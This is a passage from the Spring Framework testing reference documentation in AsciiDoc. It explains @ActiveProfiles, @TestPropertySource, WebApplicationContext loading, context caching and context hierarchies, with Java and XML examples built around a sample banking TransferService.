id=\"accountRepository\"\n\t\t\t\tclass=\"com.bank.repository.internal.JdbcAccountRepository\">\n\t\t\t<constructor-arg ref=\"dataSource\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"feePolicy\"\n\t\t\tclass=\"com.bank.service.internal.ZeroFeePolicy\"\/>\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\n\t\t<beans profile=\"default\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"classpath:\/app-config.xml\"\n\t@ContextConfiguration(\"\/app-config.xml\")\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nWhen `TransferServiceTest` is run, its `ApplicationContext` will be loaded from the\n`app-config.xml` configuration file in the root of the classpath. If you inspect\n`app-config.xml` you'll notice that the `accountRepository` bean has a dependency on a\n`dataSource` bean; however, `dataSource` is not defined as a top-level bean. Instead,\n`dataSource` is defined three times: in the __production__ profile, the\n__dev__ profile, and the __default__ profile.\n\nBy annotating `TransferServiceTest` with `@ActiveProfiles(\"dev\")` we instruct the Spring\nTestContext Framework to load the `ApplicationContext` with the active profiles set to\n`{\"dev\"}`. As a result, an embedded database will be created and populated with test data,\nand the `accountRepository` bean will be wired with a reference to the development\n`DataSource`. And that's likely what we want in an integration test.\n\nIt is sometimes useful to assign beans to a `default` profile. Beans within the default profile\nare only included when no other profile is specifically activated. This can be used to define\n_fallback_ beans to be used in the application's default state. For example, you may\nexplicitly provide a data source for `dev` and `production` profiles, but define an in-memory\ndata source as a default when neither of these is active.\n\nThe following code listings demonstrate how to implement the same configuration and\nintegration test but using `@Configuration` classes instead of XML.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"dev\")\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"default\")\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class TransferServiceConfig {\n\n\t\t@Autowired DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new DefaultTransferService(accountRepository(), feePolicy());\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic FeePolicy feePolicy() {\n\t\t\treturn new ZeroFeePolicy();\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nIn this variation, we have split the XML configuration into four independent\n`@Configuration` classes:\n\n* `TransferServiceConfig`: acquires a `dataSource` via dependency injection using\n `@Autowired`\n* `StandaloneDataConfig`: defines a `dataSource` for an embedded database suitable for\n developer tests\n* `JndiDataConfig`: defines a `dataSource` that is retrieved from JNDI in a production\n environment\n* `DefaultDataConfig`: defines a `dataSource` for a default embedded database in case\n no profile is active\n\nAs with the XML-based configuration example, we still annotate `TransferServiceTest`\nwith `@ActiveProfiles(\"dev\")`, but this time we specify all four configuration classes\nvia the `@ContextConfiguration` annotation. The body of the test class itself remains\ncompletely unchanged.\n\nIt is often the case that a single set of profiles is used across multiple test classes\nwithin a given project. Thus, to avoid duplicate declarations of the `@ActiveProfiles`\nannotation it is possible to declare `@ActiveProfiles` once on a base class, and\nsubclasses will automatically inherit the `@ActiveProfiles` configuration from the base\nclass. In the following example, the declaration of `@ActiveProfiles` (as well as other\nannotations) has been moved to an abstract superclass, `AbstractIntegrationTest`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic abstract class AbstractIntegrationTest {\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile inherited from superclass\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\n`@ActiveProfiles` also supports an `inheritProfiles` attribute that can be used to\ndisable the inheritance of active profiles.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden with \"production\"\n\t@ActiveProfiles(profiles = \"production\", inheritProfiles = false)\n\tpublic class ProductionTransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles-ActiveProfilesResolver]]\nFurthermore, it is sometimes necessary to resolve active profiles for tests\n__programmatically__ instead of declaratively -- for example, based on:\n\n* the current operating system\n* whether tests are being executed on a continuous integration build server\n* the presence of certain environment variables\n* the presence of custom class-level annotations\n* etc.\n\nTo resolve active bean definition profiles programmatically, simply implement a custom\n`ActiveProfilesResolver` and register it via the `resolver` attribute of\n`@ActiveProfiles`. The following example demonstrates how to implement and register a\ncustom `OperatingSystemActiveProfilesResolver`. For further information, refer to the\ncorresponding javadocs.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden programmatically via a custom resolver\n\t@ActiveProfiles(\n\t\tresolver = OperatingSystemActiveProfilesResolver.class,\n\t\tinheritProfiles = false)\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service.test;\n\n\tpublic class OperatingSystemActiveProfilesResolver implements ActiveProfilesResolver {\n\n\t\t@Override\n\t\tString[] resolve(Class<?> testClass) {\n\t\t\tString profile = ...;\n\t\t\t\/\/ determine the value of profile based on the operating system\n\t\t\treturn new String[] {profile};\n\t\t}\n\t}\n----\n\n[[testcontext-ctx-management-property-sources]]\n===== Context configuration with test property sources\n\nSpring 3.1 introduced first-class support in the framework for the notion of an\nenvironment with a hierarchy of _property sources_, and since Spring 4.1 integration\ntests can be configured with test-specific property sources. In contrast to the\n`@PropertySource` annotation used on `@Configuration` classes, the `@TestPropertySource`\nannotation can be declared on a test class to declare resource locations for test\nproperties files or _inlined_ properties. These test property sources will be added to\nthe set of `PropertySources` in the `Environment` for the `ApplicationContext` loaded\nfor the annotated integration test.\n\n[NOTE]\n====\n`@TestPropertySource` may be used with any implementation of the `SmartContextLoader`\nSPI, but `@TestPropertySource` is not supported with implementations of the older\n`ContextLoader` SPI.\n\nImplementations of `SmartContextLoader` gain access to merged test property source values\nvia the `getPropertySourceLocations()` and `getPropertySourceProperties()` methods in\n`MergedContextConfiguration`.\n====\n\n*Declaring test property sources*\n\nTest properties files can be configured via the `locations` or `value` attribute of\n`@TestPropertySource` as shown in the following example.\n\nBoth traditional and XML-based properties file formats are supported -- for example,\n`\"classpath:\/com\/example\/test.properties\"` or `\"file:\/\/\/path\/to\/file.xml\"`.\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"test.properties\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/test.xml\"`. A path which\nreferences a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.) will\nbe loaded using the specified resource protocol. Resource location wildcards (e.g.\n`**\/*.properties`) are not permitted: each location must evaluate to exactly one\n`.properties` or `.xml` resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n_Inlined_ properties in the form of key-value pairs can be configured via the\n`properties` attribute of `@TestPropertySource` as shown in the following example. All\nkey-value pairs will be added to the enclosing `Environment` as a single test\n`PropertySource` with the highest precedence.\n\nThe supported syntax for key-value pairs is the same as the syntax defined for entries in\na Java properties file:\n\n* `\"key=value\"`\n* `\"key:value\"`\n* `\"key value\"`\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(properties = {\"timezone = GMT\", \"port: 4242\"})\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Default properties file detection*\n\nIf `@TestPropertySource` is declared as an empty annotation (i.e., without explicit\nvalues for the `locations` or `properties` attributes), an attempt will be made to detect\na _default_ properties file relative to the class that declared the annotation. For\nexample, if the annotated test class is `com.example.MyTest`, the corresponding default\nproperties file is `\"classpath:com\/example\/MyTest.properties\"`. If the default cannot be\ndetected, an `IllegalStateException` will be thrown.\n\n*Precedence*\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nIn the following example, the `timezone` and `port` properties as well as any properties\ndefined in `\"\/test.properties\"` will override any properties of the same name that are\ndefined in system and application property sources. Furthermore, if the\n`\"\/test.properties\"` file defines entries for the `timezone` and `port` properties those\nwill be overridden by the _inlined_ properties declared via the `properties` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\n\t\tlocations = \"\/test.properties\",\n\t\tproperties = {\"timezone = GMT\", \"port: 4242\"}\n\t)\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Inheriting and overriding test property sources*\n\n`@TestPropertySource` supports boolean `inheritLocations` and `inheritProperties`\nattributes that denote whether resource locations for properties files and inlined\nproperties declared by superclasses should be __inherited__. The default value for both\nflags is `true`. This means that a test class inherits the locations and inlined\nproperties declared by any superclasses. Specifically, the locations and inlined\nproperties for a test class are appended to the locations and inlined properties declared\nby superclasses. Thus, subclasses have the option of __extending__ the locations and\ninlined properties. Note that properties that appear later will __shadow__ (i.e..,\noverride) properties of the same name that appear earlier. In addition, the\naforementioned precedence rules apply for inherited test property sources as well.\n\nIf the `inheritLocations` or `inheritProperties` attribute in `@TestPropertySource` is set\nto `false`, the locations or inlined properties, respectively, for the test class __shadow__\nand effectively replace the configuration defined by superclasses.\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using\nonly the `\"base.properties\"` file as a test property source. In contrast, the\n`ApplicationContext` for `ExtendedTest` will be loaded using the `\"base.properties\"`\n**and** `\"extended.properties\"` files as test property source locations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(\"base.properties\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(\"extended.properties\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using only\nthe _inlined_ `key1` property. In contrast, the `ApplicationContext` for `ExtendedTest` will be\nloaded using the _inlined_ `key1` and `key2` properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(properties = \"key1 = value1\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(properties = \"key2 = value2\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\n[[testcontext-ctx-management-web]]\n===== Loading a WebApplicationContext\nSpring 3.2 introduced support for loading a `WebApplicationContext` in integration\ntests. To instruct the TestContext framework to load a `WebApplicationContext` instead\nof a standard `ApplicationContext`, simply annotate the respective test class with\n`@WebAppConfiguration`.\n\nThe presence of `@WebAppConfiguration` on your test class instructs the TestContext\nframework (TCF) that a `WebApplicationContext` (WAC) should be loaded for your\nintegration tests. In the background the TCF makes sure that a `MockServletContext` is\ncreated and supplied to your test's WAC. By default the base resource path for your\n`MockServletContext` will be set to __\"src\/main\/webapp\"__. This is interpreted as a path\nrelative to the root of your JVM (i.e., normally the path to your project). If you're\nfamiliar with the directory structure of a web application in a Maven project, you'll\nknow that __\"src\/main\/webapp\"__ is the default location for the root of your WAR. If you\nneed to override this default, simply provide an alternate path to the\n`@WebAppConfiguration` annotation (e.g., `@WebAppConfiguration(\"src\/test\/webapp\")`). If\nyou wish to reference a base resource path from the classpath instead of the file\nsystem, just use Spring's __classpath:__ prefix.\n\nPlease note that Spring's testing support for `WebApplicationContexts` is on par with its\nsupport for standard `ApplicationContexts`. When testing with a `WebApplicationContext`\nyou are free to declare XML configuration files, Groovy scripts, or `@Configuration`\nclasses via `@ContextConfiguration`. You are of course also free to use any other test\nannotations such as `@ActiveProfiles`, `@TestExecutionListeners`, `@Sql`, `@Rollback`,\netc.\n\nThe following examples demonstrate some of the various configuration options for loading\na `WebApplicationContext`.\n\n.Conventions\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ defaults to \"file:src\/main\/webapp\"\n\t@WebAppConfiguration\n\n\t\/\/ detects \"WacTests-context.xml\" in same package\n\t\/\/ or static nested @Configuration class\n\t@ContextConfiguration\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThe above example demonstrates the TestContext framework's support for __convention over\nconfiguration__. If you annotate a test class with `@WebAppConfiguration` without\nspecifying a resource base path, the resource path will effectively default\nto __\"file:src\/main\/webapp\"__. Similarly, if you declare `@ContextConfiguration` without\nspecifying resource `locations`, annotated `classes`, or context `initializers`, Spring\nwill attempt to detect the presence of your configuration using conventions\n(i.e., __\"WacTests-context.xml\"__ in the same package as the `WacTests` class or static\nnested `@Configuration` classes).\n\n.Default resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ file system resource\n\t@WebAppConfiguration(\"webapp\")\n\n\t\/\/ classpath resource\n\t@ContextConfiguration(\"\/spring\/test-servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nThis example demonstrates how to explicitly declare a resource base path with\n`@WebAppConfiguration` and an XML resource location with `@ContextConfiguration`. The\nimportant thing to note here is the different semantics for paths with these two\nannotations. By default, `@WebAppConfiguration` resource paths are file system based;\nwhereas, `@ContextConfiguration` resource locations are classpath based.\n\n.Explicit resource semantics\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\n\t\/\/ classpath resource\n\t@WebAppConfiguration(\"classpath:test-web-resources\")\n\n\t\/\/ file system resource\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/servlet-config.xml\")\n\n\tpublic class WacTests {\n\t\t\/\/...\n\t}\n----\n\nIn this third example, we see that we can override the default resource semantics for\nboth annotations by specifying a Spring resource prefix. Contrast the comments in this\nexample with the previous example.\n\n.[[testcontext-ctx-management-web-mocks]]Working with Web Mocks\n--\nTo provide comprehensive web testing support, Spring 3.2 introduced a\n`ServletTestExecutionListener` that is enabled by default. When testing against a\n`WebApplicationContext` this <<testcontext-key-abstractions,TestExecutionListener>> sets\nup default thread-local state via Spring Web's `RequestContextHolder` before each test\nmethod and creates a `MockHttpServletRequest`, `MockHttpServletResponse`, and\n`ServletWebRequest` based on the base resource path configured via\n`@WebAppConfiguration`. `ServletTestExecutionListener` also ensures that the\n`MockHttpServletResponse` and `ServletWebRequest` can be injected into the test\ninstance, and once the test is complete it cleans up thread-local state.\n\nOnce you have a `WebApplicationContext` loaded for your test you might find that you\nneed to interact with the web mocks -- for example, to set up your test fixture or to\nperform assertions after invoking your web component. The following example demonstrates\nwhich mocks can be autowired into your test instance. Note that the\n`WebApplicationContext` and `MockServletContext` are both cached across the test suite;\nwhereas, the other mocks are managed per test method by the\n`ServletTestExecutionListener`.\n\n.Injecting mocks\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@WebAppConfiguration\n\t@ContextConfiguration\n\tpublic class WacTests {\n\n\t\t@Autowired\n\t\tWebApplicationContext wac; \/\/ cached\n\n\t\t@Autowired\n\t\tMockServletContext servletContext; \/\/ cached\n\n\t\t@Autowired\n\t\tMockHttpSession session;\n\n\t\t@Autowired\n\t\tMockHttpServletRequest request;\n\n\t\t@Autowired\n\t\tMockHttpServletResponse response;\n\n\t\t@Autowired\n\t\tServletWebRequest webRequest;\n\n\t\t\/\/...\n\t}\n----\n--\n\n[[testcontext-ctx-management-caching]]\n===== Context caching\n\nOnce the TestContext framework loads an `ApplicationContext` (or `WebApplicationContext`)\nfor a test, that context will be cached and reused for __all__ subsequent tests that\ndeclare the same unique context configuration within the same test suite. To understand\nhow caching works, it is important to understand what is meant by __unique__ and __test\nsuite__.\n\nAn `ApplicationContext` can be __uniquely__ identified by the combination of\nconfiguration parameters that is used to load it. Consequently, the unique combination\nof configuration parameters is used to generate a __key__ under which the context is\ncached. The TestContext framework uses the following configuration parameters to build\nthe context cache key:\n\n* `locations` __(from @ContextConfiguration)__\n* `classes` __(from @ContextConfiguration)__\n* `contextInitializerClasses` __(from @ContextConfiguration)__\n* `contextCustomizers` __(from ContextCustomizerFactory)__\n* `contextLoader` __(from @ContextConfiguration)__\n* `parent` __(from @ContextHierarchy)__\n* `activeProfiles` __(from @ActiveProfiles)__\n* `propertySourceLocations` __(from @TestPropertySource)__\n* `propertySourceProperties` __(from @TestPropertySource)__\n* `resourceBasePath` __(from @WebAppConfiguration)__\n\nFor example, if `TestClassA` specifies `{\"app-config.xml\", \"test-config.xml\"}` for the\n`locations` (or `value`) attribute of `@ContextConfiguration`, the TestContext framework\nwill load the corresponding `ApplicationContext` and store it in a `static` context cache\nunder a key that is based solely on those locations. So if `TestClassB` also defines\n`{\"app-config.xml\", \"test-config.xml\"}` for its locations (either explicitly or\nimplicitly through inheritance) but does not define `@WebAppConfiguration`, a different\n`ContextLoader`, different active profiles, different context initializers, different\ntest property sources, or a different parent context, then the same `ApplicationContext`\nwill be shared by both test classes. This means that the setup cost for loading an\napplication context is incurred only once (per test suite), and subsequent test execution\nis much faster.\n\n.Test suites and forked processes\n[NOTE]\n====\nThe Spring TestContext framework stores application contexts in a __static__ cache. This\nmeans that the context is literally stored in a `static` variable. In other words, if\ntests execute in separate processes the static cache will be cleared between each test\nexecution, and this will effectively disable the caching mechanism.\n\nTo benefit from the caching mechanism, all tests must run within the same process or\ntest suite. This can be achieved by executing all tests as a group within an IDE.\nSimilarly, when executing tests with a build framework such as Ant, Maven, or Gradle it\nis important to make sure that the build framework does not __fork__ between tests. For\nexample, if the\nhttp:\/\/maven.apache.org\/plugins\/maven-surefire-plugin\/test-mojo.html#forkMode[forkMode]\nfor the Maven Surefire plug-in is set to `always` or `pertest`, the TestContext\nframework will not be able to cache application contexts between test classes and the\nbuild process will run significantly slower as a result.\n====\n\nSince Spring Framework 4.3, the size of the context cache is bounded with a default\nmaximum size of 32. Whenever the maximum size is reached, a _least recently used_ (LRU)\neviction policy is used to evict and close stale contexts. The maximum size can be\nconfigured from the command line or a build script by setting a JVM system property named\n`spring.test.context.cache.maxSize`. As an alternative, the same property can be set\nprogrammatically via the `SpringProperties` API.\n\nSince having a large number of application contexts loaded within a given test suite can\ncause the suite to take an unnecessarily long time to execute, it is often beneficial to\nknow exactly how many contexts have been loaded and cached. To view the statistics for\nthe underlying context cache, simply set the log level for the\n`org.springframework.test.context.cache` logging category to `DEBUG`.\n\nIn the unlikely case that a test corrupts the application context and requires reloading\n-- for example, by modifying a bean definition or the state of an application object --\nyou can annotate your test class or test method with `@DirtiesContext` (see the\ndiscussion of `@DirtiesContext` in <<integration-testing-annotations-spring>>). This\ninstructs Spring to remove the context from the cache and rebuild the application\ncontext before executing the next test. Note that support for the `@DirtiesContext`\nannotation is provided by the `DirtiesContextBeforeModesTestExecutionListener` and the\n`DirtiesContextTestExecutionListener` which are enabled by default.\n\n\n[[testcontext-ctx-management-ctx-hierarchies]]\n===== Context hierarchies\n\nWhen writing integration tests that rely on a loaded Spring `ApplicationContext`, it is\noften sufficient to test against a single context; however, there are times when it is\nbeneficial or even necessary to test against a hierarchy of ``ApplicationContext``s. For\nexample, if you are developing a Spring MVC web application you will typically have a\nroot `WebApplicationContext` loaded via Spring's `ContextLoaderListener` and a child\n`WebApplicationContext` loaded via Spring's `DispatcherServlet`. This results in a\nparent-child context hierarchy where shared components and infrastructure configuration\nare declared in the root context and consumed in the child context by web-specific\ncomponents. Another use case can be found in Spring Batch applications where you often\nhave a parent context that provides configuration for shared batch infrastructure and a\nchild context for the configuration of a specific batch job.\n\nSince Spring Framework 3.2.2, it is possible to write integration tests that use context\nhierarchies by declaring context configuration via the `@ContextHierarchy` annotation,\neither on an individual test class or within a test class hierarchy. If a context\nhierarchy is declared on multiple classes within a test class hierarchy it is also\npossible to merge or override the context configuration for a specific, named level in\nthe context hierarchy. When merging configuration for a given level in the hierarchy the\nconfiguration resource type (i.e., XML configuration files or annotated classes) must be\nconsistent; otherwise, it is perfectly acceptable to have different levels in a context\nhierarchy configured using different resource types.\n\nThe following JUnit 4 based examples demonstrate common configuration scenarios for\nintegration tests that require the use of context hierarchies.\n\n.Single test class with context hierarchy\n--\n`ControllerIntegrationTests` represents a typical integration testing scenario for a\nSpring MVC web application by declaring a context hierarchy consisting of two levels,\none for the __root__ WebApplicationContext (loaded using the `TestAppConfig`\n`@Configuration` class) and one for the __dispatcher servlet__ `WebApplicationContext`\n(loaded using the `WebConfig` `@Configuration` class). The `WebApplicationContext` that\nis __autowired__ into the test instance is the one for the child context (i.e., the\nlowest context in the hierarchy).\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(classes = TestAppConfig.class),\n\t\t@ContextConfiguration(classes = WebConfig.class)\n\t})\n\tpublic class ControllerIntegrationTests {\n\n\t\t@Autowired\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ ...\n\t}\n----\n\n--\n\n\n.Class hierarchy with implicit parent context\n--\nThe following test classes define a context hierarchy within a test class hierarchy.\n`AbstractWebTests` declares the configuration for a root `WebApplicationContext` in a\nSpring-powered web application. Note, however, that `AbstractWebTests` does not declare\n`@ContextHierarchy`; consequently, subclasses of `AbstractWebTests` can optionally\nparticipate in a context hierarchy or simply follow the standard semantics for\n`@ContextConfiguration`. `SoapWebServiceTests` and `RestWebServiceTests` both extend\n`AbstractWebTests` and define a context hierarchy via `@ContextHierarchy`. The result is\nthat three application contexts will be loaded (one for each declaration of\n`@ContextConfiguration`), and the application context loaded based on the configuration\nin `AbstractWebTests` will be set as the parent context for each of the contexts loaded\nfor the concrete subclasses.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@WebAppConfiguration\n\t@ContextConfiguration(\"file:src\/main\/webapp\/WEB-INF\/applicationContext.xml\")\n\tpublic abstract class AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/soap-ws-config.xml\")\n\tpublic class SoapWebServiceTests extends AbstractWebTests {}\n\n\t@ContextHierarchy(@ContextConfiguration(\"\/spring\/rest-ws-config.xml\")\n\tpublic class RestWebServiceTests extends AbstractWebTests {}\n----\n--\n\n\n.Class hierarchy with merged context hierarchy configuration\n--\nThe following classes demonstrate the use of __named__ hierarchy levels in order to\n__merge__ the configuration for specific levels in a context hierarchy. `BaseTests`\ndefines two levels in the hierarchy, `parent` and `child`. `ExtendedTests` extends\n`BaseTests` and instructs the Spring TestContext Framework to merge the context\nconfiguration for the `child` hierarchy level, simply by ensuring that the names\ndeclared via the `name` attribute in `@ContextConfiguration` are both `\"child\"`. The\nresult is that three application contexts will be loaded: one for `\"\/app-config.xml\"`,\none for `\"\/user-config.xml\"`, and one for `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\nAs with the previous example, the application context loaded from `\"\/app-config.xml\"`\nwill be set as the parent context for the contexts loaded from `\"\/user-config.xml\"`\nand `{\"\/user-config.xml\", \"\/order-config.xml\"}`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/order-config.xml\")\n\t)\n\tpublic class ExtendedTests extends BaseTests {}\n----\n--\n\n.Class hierarchy with overridden context hierarchy configuration\n--\nIn contrast to the previous example, this example demonstrates how to __override__ the\nconfiguration for a given named level in a context hierarchy by setting the\n`inheritLocations` flag in `@ContextConfiguration` to `false`. Consequently, the\napplication context for `ExtendedTests` will be loaded only from\n`\"\/test-user-config.xml\"` and will have its parent set to the context loaded from\n`\"\/app-config.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextHierarchy({\n\t\t@ContextConfiguration(name = \"parent\", locations = \"\/app-config.xml\"),\n\t\t@ContextConfiguration(name = \"child\", locations = \"\/user-config.xml\")\n\t})\n\tpublic class BaseTests {}\n\n\t@ContextHierarchy(\n\t\t@ContextConfiguration(\n\t\t\tname = \"child\",\n\t\t\tlocations = \"\/test-user-config.xml\",\n\t\t\tinheritLocations = false\n\t))\n\tpublic class ExtendedTests extends BaseTests {}\n----\n\n.Dirtying a context within a context hierarchy\n[NOTE]\n====\nIf `@DirtiesContext` is used in a test whose context is configured as part of a context\nhierarchy, the `hierarchyMode` flag can be used to control how the context cache is\ncleared. For further details consult the discussion of `@DirtiesContext` in\n<<integration-testing-annotations-spring,Spring Testing Annotations>> and the\n`@DirtiesContext` javadocs.\n====\n--\n\n\n[[testcontext-fixture-di]]\n==== Dependency injection of test fixtures\nWhen you use the `DependencyInjectionTestExecutionListener` -- which is configured by\ndefault -- the dependencies of your test instances are __injected__ from beans in the\napplication context that you configured with `@ContextConfiguration`. You may use setter\ninjection, field injection, or both, depending on which annotations you choose and\nwhether you place them on setter methods or fields. For consistency with the annotation\nsupport introduced in Spring 2.5 and 3.0, you can use Spring's `@Autowired` annotation\nor the `@Inject` annotation from JSR 330.\n\n[TIP]\n====\n\nThe TestContext framework does not instrument the manner in which a test instance is\ninstantiated. Thus the use of `@Autowired` or `@Inject` for constructors has no effect\nfor test classes.\n====\n\nBecause `@Autowired` is used to 